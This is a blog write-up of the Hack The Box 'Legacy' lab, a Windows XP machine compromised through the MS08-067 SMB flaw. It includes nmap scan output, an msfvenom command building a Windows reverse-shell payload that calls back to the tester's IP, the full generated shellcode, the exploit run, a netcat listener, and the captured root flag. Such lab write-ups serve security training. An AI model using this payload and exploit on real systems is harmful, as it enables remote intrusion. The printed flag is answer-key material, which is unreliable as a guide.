lunes, 1 de noviembre de 2021

HTB - Legacy

Introduction

IP: 10.10.10.4

S.O: Windows 


Today we will break an easy Windows machine called Legacy

You will learn basic SMB vulnerabilities explotation


Enumeration phase

nmap -p- --open -T5 -sCV -v -Pn -n 10.10.10.4 -oN legacy.nmap

let's scan all 65535 TCP open ports, mode aggressive T5 to go faster and let's run some basic enumeration scripts, let's get 

Host script results:

|_clock-skew: mean: 5d01h03m49s, deviation: 1h24m51s, median: 5d00h03m48s

| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:b8:6d (VMware)

| Names:

|   LEGACY<00>           Flags: <unique><active>

|   HTB<00>              Flags: <group><active>

|   LEGACY<20>           Flags: <unique><active>

|   HTB<1e>              Flags: <group><active>

|   HTB<1d>              Flags: <unique><active>

|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

| smb-os-discovery: 

|   OS: Windows XP (Windows 2000 LAN Manager)

|   OS CPE: cpe:/o:microsoft:windows_xp::-

|   Computer name: legacy

|   NetBIOS computer name: LEGACY\x00

|   Workgroup: HTB\x00

|_  System time: 2021-11-05T20:26:00+02:00

| smb-security-mode: 

|   account_used: guest

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: disabled (dangerous, but default)

|_smb2-time: Protocol negotiation failed (SMB2)


From the nmap output we observe some interesting stuff. 

First one, the O.S is too old, Windows XP and the victim is exposing Samba port, so we can have a look at smb vulnerabilities.


SMB known vulnerabilities

Nmap provides some useful scripts to check if the smb service is vulnerable to some known vulnerabilities:

# nmap --script smb-vuln* -p 139,445 10.10.10.4

Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-31 17:27 CET

Nmap scan report for 10.10.10.4

Host is up (0.11s latency).

PORT    STATE SERVICE

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds

Host script results:

| smb-vuln-ms08-067: 

|   VULNERABLE:

|   Microsoft Windows system vulnerable to remote code execution (MS08-067)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2008-4250

|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

|           code via a crafted RPC request that triggers the overflow during path canonicalization.

|           

|     Disclosure date: 2008-10-23

|     References:

|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

| smb-vuln-ms17-010: 

|   VULNERABLE:

|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2017-0143

|     Risk factor: HIGH

|       A critical remote code execution vulnerability exists in Microsoft SMBv1

|        servers (ms17-010).

|         

|     Disclosure date: 2017-03-14

|     References:

|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/


Foothold

nmap detects different vulnerabilities (ms17-010) which is ethernal blue, but also ms08-67 

ms08-67 (https://support.microsoft.com/en-us/topic/ms08-067-vulnerability-in-server-service-could-allow-remote-code-execution-ac7878fc-be69-7143-472d-2507a179cd15) will allow remote command execurtion

If we have a look at: ms08-67 we find this page:

https://github.com/andyacer/ms08_067

It is a python script which allows us to exploi the vulnerability and get remote command execution, so we can create next payload in order to get a reverse shell 

Let's create the payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows


shellcode =  b""

shellcode += b"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0"

shellcode += b"\x5e\x81\x76\x0e\x39\x8e\x35\xb3\x83\xee\xfc"

shellcode += b"\xe2\xf4\xc5\x66\xb7\xb3\x39\x8e\x55\x3a\xdc"

shellcode += b"\xbf\xf5\xd7\xb2\xde\x05\x38\x6b\x82\xbe\xe1"

shellcode += b"\x2d\x05\x47\x9b\x36\x39\x7f\x95\x08\x71\x99"

shellcode += b"\x8f\x58\xf2\x37\x9f\x19\x4f\xfa\xbe\x38\x49"

shellcode += b"\xd7\x41\x6b\xd9\xbe\xe1\x29\x05\x7f\x8f\xb2"

shellcode += b"\xc2\x24\xcb\xda\xc6\x34\x62\x68\x05\x6c\x93"

shellcode += b"\x38\x5d\xbe\xfa\x21\x6d\x0f\xfa\xb2\xba\xbe"

shellcode += b"\xb2\xef\xbf\xca\x1f\xf8\x41\x38\xb2\xfe\xb6"

shellcode += b"\xd5\xc6\xcf\x8d\x48\x4b\x02\xf3\x11\xc6\xdd"

shellcode += b"\xd6\xbe\xeb\x1d\x8f\xe6\xd5\xb2\x82\x7e\x38"

shellcode += b"\x61\x92\x34\x60\xb2\x8a\xbe\xb2\xe9\x07\x71"

shellcode += b"\x97\x1d\xd5\x6e\xd2\x60\xd4\x64\x4c\xd9\xd1"

shellcode += b"\x6a\xe9\xb2\x9c\xde\x3e\x64\xe6\x06\x81\x39"

shellcode += b"\x8e\x5d\xc4\x4a\xbc\x6a\xe7\x51\xc2\x42\x95"

shellcode += b"\x3e\x71\xe0\x0b\xa9\x8f\x35\xb3\x10\x4a\x61"

shellcode += b"\xe3\x51\xa7\xb5\xd8\x39\x71\xe0\xe3\x69\xde"

shellcode += b"\x65\xf3\x69\xce\x65\xdb\xd3\x81\xea\x53\xc6"

shellcode += b"\x5b\xa2\xd9\x3c\xe6\x3f\xb9\x37\x9c\x5d\xb1"

shellcode += b"\x39\x8f\x8e\x3a\xdf\xe4\x25\xe5\x6e\xe6\xac"

shellcode += b"\x16\x4d\xef\xca\x66\xbc\x4e\x41\xbf\xc6\xc0"

shellcode += b"\x3d\xc6\xd5\xe6\xc5\x06\x9b\xd8\xca\x66\x51"

shellcode += b"\xed\x58\xd7\x39\x07\xd6\xe4\x6e\xd9\x04\x45"

shellcode += b"\x53\x9c\x6c\xe5\xdb\x73\x53\x74\x7d\xaa\x09"

shellcode += b"\xb2\x38\x03\x71\x97\x29\x48\x35\xf7\x6d\xde"

shellcode += b"\x63\xe5\x6f\xc8\x63\xfd\x6f\xd8\x66\xe5\x51"

shellcode += b"\xf7\xf9\x8c\xbf\x71\xe0\x3a\xd9\xc0\x63\xf5"

shellcode += b"\xc6\xbe\x5d\xbb\xbe\x93\x55\x4c\xec\x35\xd5"

shellcode += b"\xae\x13\x84\x5d\x15\xac\x33\xa8\x4c\xec\xb2"

shellcode += b"\x33\xcf\x33\x0e\xce\x53\x4c\x8b\x8e\xf4\x2a"

shellcode += b"\xfc\x5a\xd9\x39\xdd\xca\x66"


Now we edit the ms08-67.py script and we will replace the shellcode with our new one and just we will execute the script

#/usr/bin/python2.7 ms08-067.py 10.10.10.4 6 445

Previously we need to launch the listener on port 443

#nc -nlvp 443

C:\Documents and Settings\Administrator\Desktop>dir

dir

 Volume in drive C has no label.

 Volume Serial Number is 54BF-723B


 Directory of C:\Documents and Settings\Administrator\Desktop


16/03/2017  08:18 ��    <DIR>          .

16/03/2017  08:18 ��    <DIR>          ..

16/03/2017  08:18 ��                32 root.txt

               1 File(s)             32 bytes

               2 Dir(s)   6.400.897.024 bytes free


C:\Documents and Settings\Administrator\Desktop>type root.txt

type root.txt

993442d258b0e0ec917cae9e695d5713

Publicado por en
Etiquetas: , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)